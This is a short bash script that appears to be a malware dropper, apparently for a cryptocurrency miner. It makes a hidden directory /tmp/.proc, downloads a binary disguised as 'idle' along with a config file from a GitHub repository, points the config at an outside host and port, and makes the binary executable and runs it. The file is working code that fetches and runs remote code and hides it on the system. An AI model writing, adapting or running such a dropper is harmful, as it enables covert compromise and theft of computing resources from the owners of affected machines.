#!/bin/bash

port="1130"
host="dyn.dream.avspic.com"
url="https://github.com/pakoinake/jzoax/raw/refs/heads/main"
work="/tmp/.proc"

# portAdd="$((RANDOM % 10))"
# port="$((port + portAdd))"
name=`TZ=":Asia/Shanghai" date '+%Y%m%d'`

[ -d "${work}" ] || mkdir -p "${work}"
cd "${work}"
if [ ! -f "./idle" ]; then
  curl -sSLo "idle" "${url}/idle" 2>/dev/null
  curl -sSLo "config.json" "${url}/idle.json" 2>/dev/null
  [ -f "config.json" ] && [ -n "$host" ] && [ -n "$port" ] && sed -i "s/\"url\":.*,/\"url\": \"${host}:${port}\",/g" "config.json"
  [ -f "config.json" ] && [ -n "$name" ] && sed -i "s/\"pass\":.*,/\"pass\": \"${name}\",/g" "config.json"
fi
chmod -R a+x ./
./idle

